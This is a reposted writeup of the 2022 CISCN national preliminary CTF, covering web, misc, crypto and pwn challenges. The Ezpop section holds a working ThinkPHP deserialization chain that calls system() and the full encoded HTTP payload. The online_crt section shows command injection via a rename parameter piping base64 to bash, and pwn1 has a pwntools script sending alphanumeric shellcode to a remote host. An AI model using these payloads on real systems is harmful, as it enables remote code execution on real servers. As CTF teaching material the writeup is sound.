2022 CISCN National Preliminary Round - Writeup

admin, 2025-02-13 10:24:45


01 Web

1 Ezpop

```php
<?php
namespace think {
    abstract class Model {
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;

        function __construct($obj = '') {
            $this->lazySave = true;                      // __destruct() then calls save()
            $this->data = ['whoami' => ['cat /flag*']];  // attribute value handed to the callback
            $this->exists = true;
            $this->table = $obj;                         // nested Pivot: its __toString() walks toArray()
            $this->withAttr = ['whoami' => ['system']];  // callback applied to the 'whoami' attribute
            $this->json = ['whoami', ['whoami']];
            $this->jsonAssoc = true;
        }
    }
}

namespace think\model {
    use think\Model;
    class Pivot extends Model {
    }
}

namespace {
    echo urlencode(serialize(new think\model\Pivot(new think\model\Pivot())));
}
```
```http
POST /index.php/index/test HTTP/1.1
Host: eci-2zecfqrktxe0xgdpn16s.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __jsluid_h=55c4791469c8ac5459a63d8da19ca192
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1249

a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22cat+%2Fflag%2A%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22cat+%2Fflag%2A%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D
```

2 online_crt

First, generate a certificate.


Next, rename the certificate to cat /flag>suanve_flag:


```http
/admin/%72%65%6e%61%6d%65?oldname=1dd80f2c-ca5e-411d-ad57-b8b95984e444.crt&newname=44.crt"%26%26echo%20Y2F0IC9mbGFnKj5zdWFudmVfZmxhZwo%3d|base64%20-d|bash%26%26echo" HTTP/1.1
Host: admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

Then generate another certificate and rename it to 44.crt:

```http
/admin/%72%65%6e%61%6d%65?oldname=97672333-1cd8-463f-9b42-e0bec5342147.crt&newname=44.crt HTTP/1.1
Host: admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

Visit createlink to trigger the command and obtain the flag.
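Added example, not part of the writeup: the input check the rename handler lacked, in Python. It decodes a request target like the two above (the percent-encoded path segment spells "rename"), allowlists oldname and newname, and builds the rename as an argv list so no shell ever parses a file name. The CERT_STORE directory is a placeholder.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed from the two rename requests above. "%72%65%6e%61%6d%65" is just
# "rename" percent-encoded; the second newname carries a shell command.
REQUESTS = [
    "/admin/%72%65%6e%61%6d%65?oldname=97672333-1cd8-463f-9b42-e0bec5342147.crt&newname=44.crt",
    "/admin/%72%65%6e%61%6d%65?oldname=1dd80f2c-ca5e-411d-ad57-b8b95984e444.crt"
    '&newname=44.crt"%26%26echo%20Y2F0IC9mbGFnKj5zdWFudmVfZmxhZwo%3d|base64%20-d|bash%26%26echo"',
]

CERT_STORE = "/certs"  # placeholder directory, not from the challenge

# Allowlist rather than denylist: a bare name, a fixed extension, no path
# separators, so quotes and shell metacharacters cannot appear at all.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.crt$")


def is_safe_name(name):
    return SAFE_NAME.match(name) is not None


def check_rename(request_target):
    """Decode a request target; return (endpoint, ok, problems).

    The path is unquoted before inspection so an encoded spelling of
    'rename' maps to the same endpoint as the plain one.
    """
    parts = urlsplit(request_target)
    endpoint = unquote(parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)
    problems = []
    for key in ("oldname", "newname"):
        values = params.get(key, [])
        if len(values) != 1:
            problems.append(f"{key}: expected exactly one value")
        elif not is_safe_name(values[0]):
            problems.append(f"{key}: rejected {values[0]!r}")
    return endpoint, not problems, problems


def rename_argv(oldname, newname):
    """Build the rename as an argv list: no shell parses the names, and '--'
    stops a name starting with '-' from being read as an option."""
    if not (is_safe_name(oldname) and is_safe_name(newname)):
        raise ValueError("unsafe file name")
    return ["mv", "--", f"{CERT_STORE}/{oldname}", f"{CERT_STORE}/{newname}"]
```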


02 Misc

1 Questionnaire

Submit the questionnaire.

2 ez_usb

Opening the capture shows data from two addresses, 2.8.1 and 2.10.1.


Extract the data with tshark:

```python
# tshark -r ez_usb.pcapng -T fields -e usb.capdata > usbdata.txt
import os
# os.system("tshark -r ez_usb.pcapng -T fields -e usb.capdata > usbdata.txt")

# USB HID keyboard usage IDs -> characters, no modifier held
normalKeys = {
    "04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h",
    "0c": "i", "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q",
    "15": "r", "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z",
    "1e": "1", "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
    "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=",
    "2f": "[", "30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",",
    "37": ".", "38": "/", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>",
    "3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}

# same usage IDs with Shift held
shiftKeys = {
    "04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H",
    "0c": "I", "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q",
    "15": "R", "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z",
    "1e": "!", "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
    "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+",
    "2f": "{", "30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<",
    "37": ">", "38": "?", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>",
    "3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}

nums = []
keys = open('usbdata.txt')
for line in keys:
    if len(line) != 17:  # first filter out USB traffic from other devices, such as the mouse
        continue
    nums.append(line[0:2] + line[4:6])  # take the 1st and 3rd bytes (modifier, key code)
keys.close()

output = ""
for n in nums:
    if n[2:4] == "00":
        continue
    if n[2:4] in normalKeys:
        if n[0:2] == "02":  # Shift was pressed
            output += shiftKeys[n[2:4]]
        else:
            output += normalKeys[n[2:4]]
    else:
        output += '[unknown]'
print('output:' + output)
```


Repair the RAR file.

Then manually extract the 10.1 data.

Unzip it to get the flag:
flag{20de17cc-d2c1-4b61-bebd-41159ed7172d}

03 Crypto

1 Sign-in

In the "Standard Telegraph Code table", look up the 7 codes corresponding to "弼时安全到达了", then apply the "mod-10 algorithm" (addition without carry, subtraction without borrow) digit by digit against the first 7*4 digits of the "codebook"; the result is the code to be sent.
Before sending the code, first send "s" to start, i.e. press "." three times. This telegraph-sending process can be captured with a packet-capture tool, which makes entering the telegram easier.
(If you need further hints, send "豪密剖析" to this official account to get them.)
The 7 codes corresponding to "弼时安全到达了": 1732 2514 1344 0356 0451 6671 0055
Mod-10 example: 1732 with 6378 gives 7000
Request example: /send?msg=s
```python
import requests

# 7 four-digit codes = 28 digits; add each digit to the codebook digit mod 10 (no carry)
c = '1732 2514 1344 0356 0451 6671 0055'.replace(' ', '')
s = '7636643745943727510026022723'
key = ""
for i in range(28):
    key += str((int(c[i]) + int(s[i])) % 10)
print(key)
```

2 Challenge-code-based mutual authentication

3 Challenge-code-based mutual authentication 2

Same as above.

4 Challenge-code-based mutual authentication 3

root/toor

04 Pwn

1 pwn1

```python
from pwn import *

context(os='linux', arch='amd64')
context.log_level = True
libc = ELF('./libc-2.33.so')
p = process('./login')
p = remote("59.110.105.63", 37355)
pay = "opt:1nmsg:ro0ttnn"
p.recv()
p.send(pay)
pay = '''opt:2nmsg:RRYh00AAX1A0hA004X1A4hA00AX1A8QX44Pj0X40PZPjAX4znoNDnRYZnCXAAnrn'''
p.recv()
p.send(pay)
p.interactive()
```


Originally published on the WeChat official account EDI安全: 2022 CISCN全国初赛-wp

Disclaimer: the programs (methods) involved in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to other uses bear all legal and joint liability; this site bears no legal or joint liability. For questions, contact us by email (preferably from a corporate or otherwise valid mailbox so the message is not intercepted; contact details are on the home page).
Please keep this link when reposting (CN-SEC中文网, with thanks to the original author): 2022 CISCN全国初赛-wp https://cn-sec.com/archives/1124472.html
